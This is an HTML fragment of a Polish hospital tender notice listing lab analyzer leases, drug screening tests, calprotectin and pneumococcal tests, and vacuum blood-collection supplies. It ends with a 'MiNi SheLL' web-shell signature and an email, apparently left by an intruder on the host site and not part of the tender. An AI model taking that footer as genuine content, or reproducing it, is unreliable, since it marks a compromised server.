16.	Możliwość wprowadzenia danych demograficznych pacjenta oraz wartości referencyjnych w zależności od płci i wieku.
17.	Automatyczne mycie sondy pobierającej po każdym pobraniu.
18.	Współpraca z laboratoryjną siecią komputerową LAB 3000 (Info-Publishing) - dwukierunkowy interfejs (na życzenie Wykonawca udostępni parametry interfejsu)
19.	Instrukcja obsługi w języku polskim.
20.	Aparaty wyposażone w zewnętrzną drukarkę laserową (czarno - białą), system podtrzymania napięcia - UPS,
dodatkowo aparat główny oraz jeden z aparatów back-up wyposażony w zewnętrzny ręczny czytnik kodów kreskowych oraz czytnik kodów wbudowany w podajnik automatycznie odczytujący próbki. 
21.	Gwarancja techniczna przez cały okres trwania umowy dzierżawy - uwzględniająca koszty napraw, wymiany podzespołów, corocznych przeglądów serwisowych zakończonych wydaniem świadectwa sprawdzenia stanu technicznego urządzeń i aparatury.
22.	Serwisowanie analizatorów tylko i wyłącznie przez autoryzowany serwis producenta aparatów.
23.	Instalacja, uruchomienie analizatora i szkolenie personelu laboratorium w zakresie obsługi oraz interpretacji wyników na koszt Wykonawcy.
24.	Oznakowanie CE analizatora głównego i analizatorów back-up..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa szybkich testów do oznaczania substancji uzależniających i narkotyków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Test paskowy do wykrywania w moczu barbiturianów	oznaczenie	400		 	 		 	 	 
2.	Test paskowy do wykrywania w moczu benzodiazepin	oznaczenie	400							 
3.	Test paskowy do wykrywania w moczu THC	oznaczenie	400							 
4.	Test paskowy do wykrywania w moczu opiatów	oznaczenie	400							
5.	Test paskowy do wykrywania w moczu amfetaminy 	oznaczenie	400							
6.	Testy do wykrywania zafałszowania moczu wykrywające minimum, zmiany pH,ciężaru właściwego, stęż.kreatyniny,obecność azotynów, aldehyduglutarowego i środków wybielających.	oznaczenie 	400							
7.	Zestaw testów kasetowych do wykrywania narkotyków i substancji uzależniających:
Morfina, Kokaina, Benzodiazepiny, Kanabinoidy, Metadon, Amfetamina, Metamfetamina, Bupremorfina, EDDP (metabolitmetadonu), Opiaty, Fenycyklidyna, Barbiturany, Trójcykliczne antydepresanty, XTC ( ekstazy ), Paracetamolu
Zestaw składający się 1 testu 12 parametrowego i 3 jednoparametrowych obejmujących łącznie wszystkie wyżej wymagane parametry	oznaczenie	500							
8.	K2 - Spice	oznaczenie	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa szybkich testów do wykrywania kalprotektyny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Szybkie testy do oznaczania kalprotektyny w kale - umożliwiające różnicowanie punkt odcięcia 50ug	oznaczenia 	150		 	 		 	 	 
2.	Szybkie testy do oznaczania kalprotektyny w kale - umożliwiające różnicowanie w zakresie poniżej 50ug , 50- 200ug i powyżej 200ug	oznaczenia 	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa odczynników wraz z dzierżawą analizatorów do paskowej analizy moczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający wymaga przeprowadzenia kontroli LabQuality-mocz 2 razy w roku
1.	Paski do analizy moczu kompatybilne z analizatorami z poz 3 i 4 	oznaczenia 	68000		 	 		 	 	 
2.	Paski do kalibracji kompatybilne z analizatorami z poz. 3 i 4	oznaczenia 	100							 
3.	Dzierżawa  analizatora spełniającego wszystkie wymagania konieczne zawarte w Tabeli nr 1.5 Wymagania konieczne odnośnie analizatora	miesiąc	36							
4.		Dzierżawa  analizatora spełniającego wszystkie wymagania konieczne zawarte w Tabeli nr 1.5 Wymagania konieczne odnośnie analizatora	miesiąc	36							
Tabela 1.5. Wymagania odnośnie analizatora
Lp.	Funkcja /parametr
1	Aparat nie starszy niż z 2015 roku
2	Nazwa urządzenia 
3	Wydajność analizatora
4	Pamięć wyników pacjenta
5	Pamięć wyników kontroli jakości
6	Odczyt 10 parametrów fizyko-chemicznych moczu /pH, ciężąr wł., leukocyty, azotyny,białko, glukoza, ciała ketonowe, urobilinogen, bilirubina, krew/
7	Możliwość wydruku w wybranych jednostkach
8	Możliwość automatycznego określenia barwy moczu oraz manualnego jej wprowadzenia do wyniku w aparacie
9	Możliwość wyboru klarowności moczu
10	Praca z wykorzystaniem pasków charakteryzujących się eliminacją wpływu kwasu askorbionowego na wynik pomiaru. Nie dopuszcza się pasków z dodatkowym polem oznaczającym poziom kwasu askorbinowego.
11	Możliwość tworzenia w aparacie raportów wyników wymagających weryfikacji
12	Możliwość współpracy z dowolną laboratoryjną siecią komputerową- dwukierunkowy interfejs( na życzenie wykonawca udostępni bezpłatnie parametry interfejsu). 
13	Serwis autoryzowany przez producenta aparatu
14	Instalacja, szkolenie personelu zakończone certyfikatem
15	M Możliwość współpracy z analizatorem osaosadu moczu
16	Wymagana czułość dla białka nie gorsza niż 20 mg/dl, dla glukozy nie gorsza niż 40 mg/dl
17	Automatyczne usuwania zużytych pasków do pojemnika
18	Komunikacja za pomocą ekranu dotykowego
19	Zestawy pasków diagnostycznych i pasków kalibracyjnych pochodzące od producenta analizatora i kompatybilne z analizatorm Miditron Junior II będący własnością zamawiającego
20	Flagowanie wyników patologicznych
21	Komunikacja przy pomocy ekranu dotykowego
22	Automatyczna kalibracja 
23	Gotowość do pracy 24 godziny na dobę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa szybkich testów do wykrywania Streptococcus pneumoniae w moczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Szybkie testy do wykrywania Streptococcus pneumoniae w moczu	oznaczenia 	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa elementów systemu aspiracyjno-próżniowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Probówki plastikowe, z zakręcanym korkiem i naklejonymi etykietami z wyjątkiem probówko-strzykawek o średnicy 13 mm 
a) probówki o średnicy 13 mm bez etykiet
b) gwarancja wytworzenia próżni tuż przed pobraniem lub możliwość pobrania przez odciągnięcie tłoka
c) wystandaryzowane i zapewniające pobranie właściwej ilości krwi
d) szybkie wykrzepienie krwi
2.Igły systemowe, łączniki - pakowane pojedynczo, eliminujące wykrzepianie się krwi podczas
pobierania do kilku probówek
3.Igły motylkowe do posiewów z krwi umożliwiające bezpośredni przepływ krwi z naczynia 
krwionośnego do butelki z podłożem
4.Cały asortyment systemu zamkniętego i przygotowania krwi do analizy przedstawiony w pakiecie musi pochodzić od jednego producenta i musi być kompatybilny z aktualnie używanym przez Zamawiającego systemem aspiracyjno-próżniowym firmy Sarstedt
1.	Probówko strzykawka z He-Li 2,5 - 3,0 ml i średnicy 13 - 14 mm	oznaczenia 	9 000		 	 		 	 	 
2.	Probówko strzykawka z He-Li 1,0 - 1,5 ml i średnicy 8,0 - 9,0 mm	oznaczenia	550							
3.	Próbówko strzykawka do OB 1,5 - 2,0 ml i średnicy 13 - 14 mm + pipeta kalibrowana 	oznaczenia	14 000 							
4.	Probówko strzykawka do różnicowania małopłytkowości z jonami Mg 2,5 - 3,0 ml i średnicy 11 - 12 ml	oznaczenia	800							
5.	Igła motylkowa 0,8; 0,9 mm z drenem do 80 mm	oznaczenia	15 000							
6.	Igła motylkowa 0,8 mm na posiew krwi z drenem do 190 mm, pakowana pojedyńczo	oznaczenia	950							
7.	Adapter do końcówki LUERA ( do podłączenia z wenflonem, trójnikiem itp. )	oznaczenia	12 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com